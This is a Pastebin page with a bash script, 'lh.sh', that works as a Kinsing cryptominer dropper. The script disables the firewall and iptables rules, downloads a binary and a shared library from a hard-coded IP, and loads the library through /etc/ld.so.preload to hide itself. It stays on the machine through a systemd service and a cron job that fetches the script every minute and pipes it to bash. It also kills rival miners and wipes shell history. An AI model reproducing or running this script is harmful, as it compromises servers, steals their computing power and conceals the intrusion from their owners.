API tools faq
paste
Guest User

lh.sh

a guest
Dec 10th, 2021
1,659
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 11.40 KB | None | 0 0
raw download clone embed print report
  1. #!/bin/bash
  2.  
  3. ulimit -n 65535
  4.  
  5. chattr -i /etc/ld.so.preload
  6. rm -f /etc/ld.so.preload
  7. chattr -R -i /var/spool/cron
  8. chattr -i /etc/crontab
  9. ufw disable
  10. iptables -F
  11. echo '0' >/proc/sys/kernel/nmi_watchdog
  12. echo 'kernel.nmi_watchdog=0' >>/etc/sysctl.conf
  13. ROOTUID="0"
  14.  
  15. function __curl() {
  16.   read proto server path <<<$(echo ${1//// })
  17.   DOC=/${path// //}
  18.   HOST=${server//:*}
  19.   PORT=${server//*:}
  20.   [[ x"${HOST}" == x"${PORT}" ]] && PORT=80
  21.  
  22.   exec 3<>/dev/tcp/${HOST}/$PORT
  23.   echo -en "GET ${DOC} HTTP/1.0\r\nHost: ${HOST}\r\n\r\n" >&3
  24.   (while read line; do
  25.    [[ "$line" == $'\r' ]] && break
  26.   done && cat) <&3
  27.   exec 3>&-
  28. }
  29.  
  30. if [ -s /usr/bin/curl ]; then
  31.   echo "found curl"
  32. elif [ -s /usr/bin/wget ]; then
  33.   echo "found wget"
  34. else
  35.   echo "found none"
  36.   if [ "$(id -u)" -ne "$ROOTUID" ] ; then
  37.     echo "not root"
  38.   else
  39.     apt-get update
  40.     apt-get install -y curl
  41.     apt-get install -y wget
  42.     apt-get install -y cron
  43.   fi
  44. fi
  45.  
  46.  
  47. SERVICE_NAME="bot"
  48. BIN_NAME="kinsing"
  49. SO_NAME="libsystem.so"
  50. BIN_PATH="/etc"
  51. if [ "$(id -u)" -ne "$ROOTUID" ] ; then
  52.   BIN_PATH="/tmp"
  53.   if [ ! -e "$BIN_PATH" ] || [ ! -w "$BIN_PATH" ]; then
  54.     echo "$BIN_PATH not exists or not writeable"
  55.     mkdir /tmp
  56.   fi
  57.   if [ ! -e "$BIN_PATH" ] || [ ! -w "$BIN_PATH" ]; then
  58.     echo "$BIN_PATH replacing with /var/tmp"
  59.     BIN_PATH="/var/tmp"
  60.   fi
  61.   if [ ! -e "$BIN_PATH" ] || [ ! -w "$BIN_PATH" ]; then
  62.     TMP_DIR=$(mktemp -d)
  63.     echo "$BIN_PATH replacing with $TMP_DIR"
  64.     BIN_PATH="$TMP_DIR"
  65.   fi
  66.   if [ ! -e "$BIN_PATH" ] || [ ! -w "$BIN_PATH" ]; then
  67.     echo "$BIN_PATH replacing with /dev/shm"
  68.     BIN_PATH="/dev/shm"
  69.   fi
  70.   if [ -e "$BIN_PATH/$BIN_NAME" ]; then
  71.     echo "$BIN_PATH/$BIN_NAME exists"
  72.     if [ ! -w "$BIN_PATH/$BIN_NAME" ]; then
  73.       echo "$BIN_PATH/$BIN_NAME not writeable"
  74.       TMP_BIN_NAME=$(head -3 /dev/urandom | tr -cd '[:alnum:]' | cut -c -8)
  75.       BIN_NAME="kinsing_$TMP_BIN_NAME"
  76.     else
  77.       echo "writeable $BIN_PATH/$BIN_NAME"
  78.     fi
  79.   fi
  80. fi
  81. BIN_FULL_PATH="$BIN_PATH/$BIN_NAME"
  82. echo "$BIN_FULL_PATH"
  83.  
  84. BIN_MD5="648effa354b3cbaad87b45f48d59c616"
  85. BIN_DOWNLOAD_URL="http://80.71.158.44/kinsing"
  86. BIN_DOWNLOAD_URL2="http://80.71.158.44/kinsing"
  87. CURL_DOWNLOAD_URL="http://80.71.158.44/curl-amd64"
  88.  
  89. SO_FULL_PATH="$BIN_PATH/$SO_NAME"
  90. SO_DOWNLOAD_URL="http://80.71.158.44/libsystem.so"
  91. SO_DOWNLOAD_URL2="http://80.71.158.44/libsystem.so"
  92. SO_MD5="ccef46c7edf9131ccffc47bd69eb743b"
  93.  
  94.  
  95. LDR="wget -q -O -"
  96. if [ -s /usr/bin/curl ]; then
  97.   LDR="curl"
  98. fi
  99. if [ -s /usr/bin/wget ]; then
  100.   LDR="wget -q -O -"
  101. fi
  102.  
  103. if [ -x "$(command -v curl)" ]; then
  104.   WGET="curl -o"
  105. elif [ -x "$(command -v wget)" ]; then
  106.   WGET="wget -O"
  107. else
  108.   curl -V || __curl "$CURL_DOWNLOAD_URL" > /usr/local/bin/curl; chmod +x /usr/local/bin/curl
  109.   /usr/local/bin/curl -V && WGET="/usr/local/bin/curl -o"
  110.   /usr/local/bin/curl -V || __curl "$CURL_DOWNLOAD_URL" > $HOME/curl; chmod +x $HOME/curl
  111.   $HOME/curl -V && WGET="$HOME/curl -o"
  112.   $HOME/curl -V || __curl "$CURL_DOWNLOAD_URL" > $BIN_PATH/curl; chmod +x $BIN_PATH/curl
  113.   $BIN_PATH/curl -V && WGET="$BIN_PATH/curl -o"
  114. fi
  115. echo "wget is $WGET"
  116.  
  117. ls -la $BIN_PATH | grep -e "/dev" | grep -v grep
  118. if [ $? -eq 0 ]; then
  119.   rm -rf $BIN_FULL_PATH
  120.   rm -rf $SO_FULL_PATH
  121.   rm -rf $BIN_PATH/kdevtmpfsi
  122.   rm -rf $BIN_PATH/libsystem.so
  123.   rm -rf /tmp/kdevtmpfsi
  124.   echo "found /dev"
  125. else
  126.   echo "not found /dev"
  127. fi
  128.  
  129. download() {
  130.   DOWNLOAD_PATH=$1
  131.   DOWNLOAD_URL=$2
  132.   if [ -L $DOWNLOAD_PATH ]
  133.   then
  134.     rm -rf $DOWNLOAD_PATH
  135.   fi
  136.   if [[ -d $DOWNLOAD_PATH ]]
  137.   then
  138.     rm -rf $DOWNLOAD_PATH
  139.   fi
  140.   chmod 777 $DOWNLOAD_PATH
  141.   $WGET $DOWNLOAD_PATH $DOWNLOAD_URL
  142.   chmod +x $DOWNLOAD_PATH
  143. }
  144.  
  145. checkExists() {
  146.   CHECK_PATH=$1
  147.   MD5=$2
  148.   sum=$(md5sum $CHECK_PATH | awk '{ print $1 }')
  149.   retval=""
  150.   if [ "$MD5" = "$sum" ]; then
  151.     echo >&2 "$CHECK_PATH is $MD5"
  152.     retval="true"
  153.   else
  154.     echo >&2 "$CHECK_PATH is not $MD5, actual $sum"
  155.     retval="false"
  156.   fi
  157.   echo "$retval"
  158. }
  159.  
  160. getSystemd() {
  161.   AUTOSTART_PATH=$1
  162.   echo "[Unit]"
  163.   echo "Description=Start daemon at boot time"
  164.   echo "After="
  165.   echo "Requires="
  166.   echo "[Service]"
  167.   echo "Type=forking"
  168.   echo "RestartSec=10s"
  169.   echo "Restart=always"
  170.   echo "TimeoutStartSec=5"
  171.   echo "ExecStart=$AUTOSTART_PATH"
  172.   echo "[Install]"
  173.   echo "WantedBy=multi-user.target"
  174. }
  175.  
  176. kill(){
  177.   ps aux | grep "agetty" | grep -v grep | awk '{if($3>80.0) print $2}' | xargs -I % kill -9 %
  178.   pkill -f 42.112.28.216
  179.   netstat -anp | grep "207.38.87.6" | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %
  180.   netstat -anp | grep "127.0.0.1:52018" | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %
  181.   netstat -anp | grep "34.81.218.76:9486" | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %
  182.   netstat -anp | grep "42.112.28.216:9486" | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %
  183.   pkill -f .git/kthreaddw
  184.   pkill -f 80.211.206.105
  185.   pkill -f 207.38.87.6
  186.   pkill -f p8444
  187.   pkill -f supportxmr
  188.   pkill -f monero
  189.   pkill -f kthreaddi
  190.   pkill -f srv00
  191.   pkill -f /tmp/.javae/javae
  192.   pkill -f .javae
  193.   pkill -f .syna
  194.   pkill -f .main
  195.   pkill -f xmm
  196.   pkill -f solr.sh
  197.   pkill -f /tmp/.solr/solrd
  198.   pkill -f /tmp/javac
  199.   pkill -f /tmp/.go.sh
  200.   pkill -f /tmp/.x/agetty
  201.   pkill -f /tmp/.x/kworker
  202.   pkill -f c3pool
  203.   pkill -f /tmp/.X11-unix/gitag-ssh
  204.   pkill -f /tmp/1
  205.   pkill -f /tmp/okk.sh
  206.   pkill -f /tmp/gitaly
  207.   pkill -f /tmp/.x/kworker
  208.   pkill -f 43a6eY5zPm3UFCaygfsukfP94ZTHz6a1kZh5sm1aZFB
  209.   pkill -f /tmp/.X11-unix/supervise
  210.   pkill -f /tmp/.ssh/redis.sh
  211.   ps aux| grep "./udp"| grep -v grep | awk '{print $2}' | xargs -I % kill -9 %
  212.   cat /tmp/.X11-unix/01|xargs -I % kill -9 %
  213.   cat /tmp/.X11-unix/11|xargs -I % kill -9 %
  214.   cat /tmp/.X11-unix/22|xargs -I % kill -9 %
  215.   cat /tmp/.pg_stat.0|xargs -I % kill -9 %
  216.   cat /tmp/.pg_stat.1|xargs -I % kill -9 %
  217.   cat $HOME/data/./oka.pid|xargs -I % kill -9 %
  218.   pkill -f zsvc
  219.   pkill -f pdefenderd
  220.   pkill -f updatecheckerd
  221.   pkill -f cruner
  222.   pkill -f dbused
  223.   pkill -f bashirc
  224.   pkill -f meminitsrv
  225.   ps aux| grep "./oka"| grep -v grep | awk '{print $2}' | xargs -I % kill -9 %
  226.   ps aux| grep "postgres: autovacum"| grep -v grep | awk '{print $2}' | xargs -I % kill -9 %
  227.   ps ax -o command,pid -www| awk 'length($1) == 8'|grep -v bin|grep -v "\["|grep -v "("|grep -v "php-fpm"|grep -v proxymap|grep -v postgres|grep -v postgrey|grep -v kinsing| awk '{print $2}'|xargs -I % kill -9 %
  228.   ps ax -o command,pid -www| awk 'length($1) == 16'|grep -v bin|grep -v "\["|grep -v "("|grep -v "php-fpm"|grep -v proxymap|grep -v postgres|grep -v postgrey| awk '{print $2}'|xargs -I % kill -9 %
  229.   ps ax| awk 'length($5) == 8'|grep -v bin|grep -v "\["|grep -v "("|grep -v "php-fpm"|grep -v proxymap|grep -v postgres|grep -v postgrey| awk '{print $1}'|xargs -I % kill -9 %
  230.   ps aux | grep -v grep | grep '/tmp/sscks' | awk '{print $2}' | xargs -I % kill -9 %
  231. }
  232.  
  233. kill
  234. autoinit() {
  235.   getSystemd $BIN_FULL_PATH >/lib/systemd/system/$SERVICE_NAME.service
  236.   systemctl enable $SERVICE_NAME
  237.   systemctl start $SERVICE_NAME
  238. }
  239.  
  240. so() {
  241.   soExists=$(checkExists "$SO_FULL_PATH" "$SO_MD5")
  242.   if [ "$soExists" == "true" ]; then
  243.     echo "$SO_FULL_PATH exists and checked"
  244.   else
  245.     echo "$SO_FULL_PATH not exists"
  246.     download $SO_FULL_PATH $SO_DOWNLOAD_URL
  247.     binExists=$(checkExists "$SO_FULL_PATH" "$SO_MD5")
  248.     if [ "$soExists" == "true" ]; then
  249.       echo "$SO_FULL_PATH after download exists and checked"
  250.     else
  251.       echo "$SO_FULL_PATH after download not exists"
  252.       download $SO_FULL_PATH $SO_DOWNLOAD_URL2
  253.       binExists=$(checkExists "$SO_FULL_PATH" "$SO_MD5")
  254.       if [ "$soExists" == "true" ]; then
  255.         echo "$SO_FULL_PATH after download2 exists and checked"
  256.       else
  257.         echo "$SO_FULL_PATH after download2 not exists"
  258.       fi
  259.     fi
  260.   fi
  261.   echo $SO_FULL_PATH >/etc/ld.so.preload
  262. }
  263.  
  264. cleanCron() {
  265.   crontab -l | sed '/base64/d' | crontab -
  266.   crontab -l | sed '/_cron/d' | crontab -
  267.   crontab -l | sed '/31.210.20.181/d' | crontab -
  268.   crontab -l | sed '/update.sh/d' | crontab -
  269.   crontab -l | sed '/logo4/d' | crontab -
  270.   crontab -l | sed '/logo9/d' | crontab -
  271.   crontab -l | sed '/logo0/d' | crontab -
  272.   crontab -l | sed '/logo/d' | crontab -
  273.   crontab -l | sed '/tor2web/d' | crontab -
  274.   crontab -l | sed '/jpg/d' | crontab -
  275.   crontab -l | sed '/png/d' | crontab -
  276.   crontab -l | sed '/tmp/d' | crontab -
  277.   crontab -l | sed '/zmreplchkr/d' | crontab -
  278.   crontab -l | sed '/aliyun.one/d' | crontab -
  279.   crontab -l | sed '/3.215.110.66.one/d' | crontab -
  280.   crontab -l | sed '/pastebin/d' | crontab -
  281.   crontab -l | sed '/onion/d' | crontab -
  282.   crontab -l | sed '/lsd.systemten.org/d' | crontab -
  283.   crontab -l | sed '/shuf/d' | crontab -
  284.   crontab -l | sed '/ash/d' | crontab -
  285.   crontab -l | sed '/mr.sh/d' | crontab -
  286.   crontab -l | sed '/185.181.10.234/d' | crontab -
  287.   crontab -l | sed '/localhost.xyz/d' | crontab -
  288.   crontab -l | sed '/45.137.151.106/d' | crontab -
  289.   crontab -l | sed '/111.90.159.106/d' | crontab -
  290.   crontab -l | sed '/github/d' | crontab -
  291.   crontab -l | sed '/bigd1ck.com/d' | crontab -
  292.   crontab -l | sed '/xmr.ipzse.com/d' | crontab -
  293.   crontab -l | sed '/185.181.10.234/d' | crontab -
  294.   crontab -l | sed '/146.71.79.230/d' | crontab -
  295.   crontab -l | sed '/122.51.164.83/d' | crontab -
  296.   crontab -l | sed '/newdat.sh/d' | crontab -
  297.   crontab -l | sed '/lib.pygensim.com/d' | crontab -
  298.   crontab -l | sed '/t.amynx.com/d' | crontab -
  299.   crontab -l | sed '/update.sh/d' | crontab -
  300.   crontab -l | sed '/systemd-service.sh/d' | crontab -
  301.   crontab -l | sed '/pg_stat.sh/d' | crontab -
  302.   crontab -l | sed '/sleep/d' | crontab -
  303.   crontab -l | sed '/oka/d' | crontab -
  304.   crontab -l | sed '/linux1213/d' | crontab -
  305.   crontab -l | sed '/#wget/d' | crontab -
  306.   crontab -l | sed '/#curl/d' | crontab -
  307.   crontab -l | sed '/zsvc/d' | crontab -
  308.   crontab -l | sed '/givemexyz/d' | crontab -
  309.   crontab -l | sed '/world/d' | crontab -
  310.   crontab -l | sed '/1.sh/d' | crontab -
  311.   crontab -l | sed '/3.sh/d' | crontab -
  312.   crontab -l | sed '/workers/d' | crontab -
  313.   crontab -l | sed '/oracleservice/d' | crontab -
  314. }
  315.  
  316. binExists=$(checkExists "$BIN_FULL_PATH" "$BIN_MD5")
  317. if [ "$binExists" == "true" ]; then
  318.   echo "$BIN_FULL_PATH exists and checked"
  319. else
  320.   echo "$BIN_FULL_PATH not exists"
  321.   download $BIN_FULL_PATH $BIN_DOWNLOAD_URL
  322.   binExists=$(checkExists "$BIN_FULL_PATH" "$BIN_MD5")
  323.   if [ "$binExists" == "true" ]; then
  324.     echo "$BIN_FULL_PATH after download exists and checked"
  325.   else
  326.     echo "$BIN_FULL_PATH after download not exists"
  327.     download $BIN_FULL_PATH $BIN_DOWNLOAD_URL2
  328.     binExists=$(checkExists "$BIN_FULL_PATH" "$BIN_MD5")
  329.     if [ "$binExists" == "true" ]; then
  330.       echo "$BIN_FULL_PATH after download2 exists and checked"
  331.     else
  332.       echo "$BIN_FULL_PATH after download2 not exists"
  333.     fi
  334.   fi
  335. fi
  336.  
  337. so
  338. if [ -L /tmp/kdevtmpfsi ]
  339. then
  340.   rm -rf /tmp/kdevtmpfsi
  341. fi
  342. rm -rf /tmp/kdevtmpfsi
  343. chmod 777 $BIN_FULL_PATH
  344. chmod +x $BIN_FULL_PATH
  345. SKL=lh $BIN_FULL_PATH
  346.  
  347. if [[ $(id -u) -ne 0 ]]; then
  348.   echo "Running as not root"
  349. else
  350.   echo "Running as root"
  351.   autoinit
  352. fi
  353.  
  354. cleanCron
  355.  
  356. crontab -l | grep -e "185.191.32.198" | grep -v grep
  357. if [ $? -eq 0 ]; then
  358.   echo "cron good"
  359. else
  360.   (
  361.     crontab -l 2>/dev/null
  362.     echo "* * * * * $LDR http://185.191.32.198/lh.sh | bash > /dev/null 2>&1"
  363.   ) | crontab -
  364. fi
  365.  
  366. history -c
  367. rm -rf ~/.bash_history
  368. history -c
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!